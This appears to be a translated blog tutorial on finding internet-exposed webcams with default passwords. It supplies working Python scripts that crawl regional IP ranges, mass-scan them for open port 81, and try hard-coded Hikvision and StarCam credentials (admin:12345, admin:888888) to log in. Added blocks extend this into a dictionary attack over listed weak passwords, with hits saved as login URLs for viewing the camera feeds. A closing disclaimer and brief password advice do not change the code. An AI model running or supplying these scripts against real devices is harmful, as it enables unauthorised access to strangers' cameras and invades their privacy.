Webcam weak-password scanning

Determine the IP range to scan

First decide which IP ranges to scan. You can write them out by hand; I crawled them from a website, grouped by region.

#coding:utf-8
# Crawl the start/end IP ranges listed for one region on ip.yqie.com (Python 3).
import re
from urllib.parse import quote

import requests
from bs4 import BeautifulSoup

place_name = "日本"    # region to look up (here: Japan)
url_ = 'http://ip.yqie.com/search.aspx?searchword=' + quote(place_name) + "&pagecurrent="
# The first result page carries "页码:1/N"; N is the total number of pages.
pagecount = re.findall(r'页码:1/(\d*?)<', requests.get(url_ + '1').text)
index = 1
with open('ip_range.txt', 'a') as fp:
    while index <= int(pagecount[0]):        # <= so the last page is not skipped
        page = requests.get(url_ + str(index))
        rows = BeautifulSoup(page.content, 'lxml').find_all("tr")
        for row in rows[1:]:                 # rows[0] is the table header
            # column 1 holds the range start, column 3 the range end
            start_ip = row.contents[1].get_text(strip=True)
            end_ip = row.contents[3].get_text(strip=True)
            fp.write(start_ip + '    ' + end_ip + '\n')
        index += 1

This produces a text file in the following format (one "start end" pair per line, both ends inclusive):
171.105.32.0 171.105.33.255
171.105.34.0 171.105.35.255
171.105.36.0 171.105.36.255
171.105.37.0 171.105.38.255
171.105.39.0 171.105.79.255

Scan for IPs with port 81 open

Scan the IP ranges from the previous step and record every IP that has TCP port 81 open.

#coding:utf-8
# Scan every address in ip_range.txt for an open TCP port 81 (Python 3).
import socket
import struct
import threading
import time

lock = threading.Lock()

def write_ip(ip):
    with open('ip_81.txt', 'a') as fp:
        fp.write(ip + '\n')

def scan(ip, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)                    # half a second per host keeps the sweep fast
    try:
        if s.connect_ex((ip, port)) == 0:   # 0 means the TCP handshake completed
            with lock:                      # one writer at a time
                write_ip(ip)
    except OSError:
        pass
    finally:
        s.close()

def get_ip_range():
    with open("ip_range.txt") as fp:
        return fp.readlines()

def ip_to_int(ip):
    # '>I' reads the four address bytes as a big-endian integer, so no ntohl() is needed
    return struct.unpack('>I', socket.inet_aton(ip))[0]

def main():
    port = 81
    for ip_range in get_ip_range():
        fields = ip_range.split()
        if len(fields) != 2:             # skip blank or malformed lines
            continue
        start, end = ip_to_int(fields[0]), ip_to_int(fields[1])
        print(ip_range.strip())
        while start <= end:              # <= so the last address of the range is scanned too
            if threading.active_count() >= 100:   # cap the number of concurrent scanner threads
                time.sleep(0.05)
                continue
            ip_point = socket.inet_ntoa(struct.pack('>I', start))
            threading.Thread(target=scan, args=(ip_point, port)).start()
            start += 1

if __name__ == '__main__':
    main()

Multithreading is used here; otherwise the scan is far too slow. Pick the thread count according to your own machine, and just don't freeze your own computer. Note that this is a full TCP connect scan: connect_ex() returning 0 means the three-way handshake completed, so every hit shows up in the target's logs.
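As an added example (not code from the original post), here is the same port-81 sweep written with the standard-library ipaddress module and a bounded thread pool. It reads the "start end" lines the crawler produces, collapses each pair into CIDR blocks, skips malformed lines instead of crashing, and scans with a fixed number of workers rather than polling threading.active_count(). The three ranges and the malformed line in SAMPLE_RANGES are constructed sample input; demo() scans only loopback addresses against a listener it opens itself, so the block runs without touching any outside network.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor

# Constructed sample in the same "start end" format the crawler writes (not real targets).
# The fourth line is deliberately malformed to show that it is skipped.
SAMPLE_RANGES = """\
171.105.32.0 171.105.33.255
171.105.34.0 171.105.35.255
171.105.36.0 171.105.36.255
171.105.x.0 171.105.40.255
"""

def parse_ranges(text):
    """Yield (first, last) IPv4Address pairs from 'start end' lines; skip malformed ones."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 2:
            continue
        try:
            first, last = ipaddress.IPv4Address(fields[0]), ipaddress.IPv4Address(fields[1])
        except ipaddress.AddressValueError:
            continue
        if first <= last:
            yield first, last

def range_to_cidrs(first, last):
    """Collapse an inclusive start/end pair (strings) into the minimal list of CIDR blocks."""
    first, last = ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    return [str(net) for net in ipaddress.summarize_address_range(first, last)]

def expand_ranges(text):
    """Every individual address covered by the ranges in text, as dotted strings."""
    for first, last in parse_ranges(text):
        for net in ipaddress.summarize_address_range(first, last):
            for host in net:
                yield str(host)

def port_open(ip, port, timeout=0.5):
    """True if a TCP handshake to ip:port completes within timeout (a connect scan)."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return True
    except OSError:
        return False

def scan_hosts(hosts, port, workers=100, timeout=0.5):
    """Probe hosts with a pool of at most `workers` threads; return the sorted list with the port open."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda h: (h, port_open(h, port, timeout)), hosts)
        return sorted(h for h, is_open in results if is_open)

def local_listener():
    """Open a throwaway TCP listener on 127.0.0.1 so the demo scans nothing external."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(('127.0.0.1', 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]

def demo():
    """Scan three loopback addresses; only 127.0.0.1 has the listener, so only it is reported."""
    srv, port = local_listener()
    try:
        return scan_hosts(['127.0.0.1', '127.0.0.2', '127.0.0.3'], port, workers=3, timeout=1.0)
    finally:
        srv.close()

if __name__ == '__main__':
    for first, last in parse_ranges(SAMPLE_RANGES):
        print(first, '-', last, '->', range_to_cidrs(str(first), str(last)))
    print(len(list(expand_ranges(SAMPLE_RANGES))), 'addresses in the sample ranges')
    print('open on loopback:', demo())
```

The CIDR form is also what you would feed to nmap or masscan instead of a hand-written scanner; range_to_cidrs shows that the 171.105.39.0 to 171.105.79.255 line from the list above is not a single block but four.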

Scanning for Hikvision

#coding:utf-8
# Try the Hikvision default credential admin:12345 on every host in ip_81.txt (Python 3).
import requests
import threading
import time

lock = threading.Lock()

def browse(ip, port):
    url = 'http://' + ip + ':' + str(port)
    userpwd = 'Basic YWRtaW46MTIzNDU='    # base64("admin:12345")
    #userpwd = 'Basic YWRtaW46ODg4ODg4'   # base64("admin:888888")
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': url + '/doc/page/login.asp',   # the original misspelled this header as 'Refer'
        'If-Modified-Since': '0',
        'Authorization': userpwd
    }
    try:
        r = requests.get(url + '/ISAPI/Security/userCheck', headers=headers, timeout=2)
        # a successful credential check answers 200 with 'OK' in the XML body
        if r.status_code == 200 and 'OK' in r.text:
            print(url)
            with lock:
                with open('hikvision.txt', 'a') as fd:
                    fd.write(url + '/doc/page/login.asp' + '\n')
    except requests.RequestException:
        pass

if __name__ == '__main__':
    with open("ip_81.txt") as fp:
        targets = [line.strip() for line in fp if line.strip()]
    index = 0
    while index < len(targets):
        if threading.active_count() >= 300:   # cap the number of concurrent probes
            time.sleep(0.05)
            continue
        threading.Thread(target=browse, args=(targets[index], 81)).start()
        index += 1

The Hikvision user-check URL (http://ip:81/ISAPI/Security/userCheck) is requested with an HTTP header (Authorization: Basic YWRtaW46MTIzNDU=) that carries the username and password: YWRtaW46MTIzNDU= Base64-decodes to admin:12345. The credential is sent pre-emptively, so no 401 round trip is needed. Hikvision products from before 2016 apparently shipped with the default password 12345; later firmware forces a password change on first use. Only the password 12345 is tried here; you can build a weak-password dictionary and run through all of it.

For logging in, Internet Explorer works best; remember to allow the plugin to run.

PS: if you don't know what Base64 encoding is, google it.

Scanning for STARCAM

#coding:utf-8
# Try the StarCam default credential admin:888888 on every host in ip_81.txt (Python 3).
import requests
import threading
import time

lock = threading.Lock()

def browse(ip, port):
    url = 'http://' + ip + ':' + str(port)
    #userpwd = 'Basic YWRtaW46MTIzNDU='   # base64("admin:12345")
    userpwd = 'Basic YWRtaW46ODg4ODg4'    # base64("admin:888888")
    headers = {'Authorization': userpwd}
    try:
        r = requests.get(url + '/monitor.htm', headers=headers, timeout=2)
        # an authenticated monitor page mentions 'camera' in its body
        if r.status_code == 200 and 'camera' in r.text:
            print(url)
            with lock:
                with open('starcam.txt', 'a') as fd:   # the original wrote these into hikvision.txt
                    fd.write(url + '\n')
    except requests.RequestException:
        pass

if __name__ == '__main__':
    with open("ip_81.txt") as fp:
        targets = [line.strip() for line in fp if line.strip()]
    index = 0
    while index < len(targets):
        if threading.active_count() >= 300:   # cap the number of concurrent probes
            time.sleep(0.05)
            continue
        threading.Thread(target=browse, args=(targets[index], 81)).start()
        index += 1

Same principle as for Hikvision; only the URL and the response check differ.
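Both scanners do the same thing: send one hard-coded Basic credential and look for a marker string in the response. The block below, an added example rather than code from the original post, generalises that into a device profile table (the paths and markers are the ones the two scanners above use) plus a dictionary walk over the weak passwords listed in the summary. It uses only the standard library; its demo() runs against a constructed mock camera on loopback whose admin password is 888888, not against a real device.

```python
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Weak-password list taken from this article's summary; the dictionary is the only thing to extend.
WEAK_PASSWORDS = ['12345', '888888', '5201314', 'qwer1234']

# One entry per device type: which URL to probe and which substring marks a successful login.
PROFILES = {
    'hikvision': {'path': '/ISAPI/Security/userCheck', 'marker': 'OK',
                  'headers': {'X-Requested-With': 'XMLHttpRequest'}},
    'starcam':   {'path': '/monitor.htm', 'marker': 'camera', 'headers': {}},
}

def basic_auth_header(user, password):
    """Build 'Basic <base64(user:password)>' exactly as the scanners hard-code it."""
    token = base64.b64encode(f'{user}:{password}'.encode()).decode('ascii')
    return 'Basic ' + token

def decode_basic_auth(header):
    """Recover 'user:password' from an Authorization header (the reverse of the above)."""
    scheme, _, token = header.partition(' ')
    if scheme.lower() != 'basic':
        raise ValueError('not a Basic authorization header')
    return base64.b64decode(token).decode()

def try_login(base_url, profile, user, password, timeout=2.0):
    """One probe: True if the device answers 200 and the body carries the profile's marker."""
    headers = dict(profile['headers'], Authorization=basic_auth_header(user, password))
    req = urllib.request.Request(base_url + profile['path'], headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode('utf-8', 'replace')
            return resp.status == 200 and profile['marker'] in body
    except (urllib.error.URLError, OSError):   # 401/403, refused, timeout: all count as a miss
        return False

def find_weak_credential(base_url, profile, user='admin', passwords=WEAK_PASSWORDS):
    """Walk the dictionary in order; return the first working (user, password) or None."""
    for pw in passwords:
        if try_login(base_url, profile, user, pw):
            return user, pw
    return None

class _MockCamera(BaseHTTPRequestHandler):
    """Constructed stand-in for a camera whose admin password is 888888 (not a real device)."""
    ACCEPT = basic_auth_header('admin', '888888')

    def do_GET(self):
        if self.headers.get('Authorization') != self.ACCEPT:
            self.send_response(401)
            self.send_header('WWW-Authenticate', 'Basic realm="camera"')
            self.end_headers()
            return
        if self.path.startswith('/ISAPI'):   # mimic the Hikvision userCheck answer
            body, ctype = b'<ResponseStatus><statusString>OK</statusString></ResponseStatus>', 'text/xml'
        else:                                  # mimic the StarCam monitor page
            body, ctype = b'<html><title>camera monitor</title></html>', 'text/html'
        self.send_response(200)
        self.send_header('Content-Type', ctype)
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):    # keep the mock quiet
        pass

def demo(profile_name='hikvision'):
    """Run the dictionary check against the mock camera on loopback; return the credential found."""
    server = HTTPServer(('127.0.0.1', 0), _MockCamera)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return find_weak_credential(f'http://127.0.0.1:{server.server_port}', PROFILES[profile_name])
    finally:
        server.shutdown()
        server.server_close()

if __name__ == '__main__':
    print(decode_basic_auth('Basic YWRtaW46MTIzNDU='))   # the header from the Hikvision scanner
    for name in PROFILES:
        print(name, '->', demo(name))
```

To use it against the port-81 list, call find_weak_credential('http://' + ip + ':81', PROFILES[name]) per host; the marker test is deliberately kept as loose as in the original scanners, so treat a hit as something to confirm by hand rather than as proof.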

Summary

1. This is only experimental, and the code is ugly, so go easy on it. I never assembled a weak-password set either; the scripts above could be merged into a single one.

2. Webcams that speak HTTP carry some risk (not that ones using a private protocol are absolutely safe). Avoid weak passwords such as 12345, 888888, 5201314 and qwer1234.

PS: the shortage of IP addresses has an upside here. Most Chinese addresses are not fixed, and a home user's IP changes within a day at most.

3. This article is an experiment. Never use it to do harm or to violate anyone's privacy.

Reference: https://www.ikeji8.com/2017/10/09/40/
